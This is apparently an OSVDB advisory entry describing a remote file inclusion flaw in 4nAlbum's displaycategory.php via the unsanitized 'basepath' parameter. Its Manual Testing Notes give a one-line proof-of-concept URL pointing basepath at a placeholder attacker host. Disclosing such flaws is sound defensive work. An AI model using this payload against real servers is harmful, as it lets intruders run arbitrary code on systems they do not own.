4nAlbum displaycategory.php Remote File Inclusion

2004-03-15T09:32:34
ID OSVDB:4292
Type osvdb
Reporter Janek Vind "waraxe"(come2waraxe@yahoo.com)
Modified 2004-03-15T09:32:34

Description

Vulnerability Description

4nAlbum contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the displaycategory.php script not properly sanitizing input to the "basepath" variable. An attacker may use this to include an arbitrary file from a remote server which will be processed and any commands executed.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

4nAlbum contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the displaycategory.php script not properly sanitizing input to the "basepath" variable. An attacker may use this to include an arbitrary file from a remote server which will be processed and any commands executed.

Manual Testing Notes

http://[victim]/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://[attacker]/

References:

Vendor URL: http://www.warp-speed.de/ Security Tracker: 1009449 Secunia Advisory ID:11134 Related OSVDB ID: 4293 Related OSVDB ID: 4291 Related OSVDB ID: 4294 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0142.html ISS X-Force ID: 15496 Bugtraq ID: 9881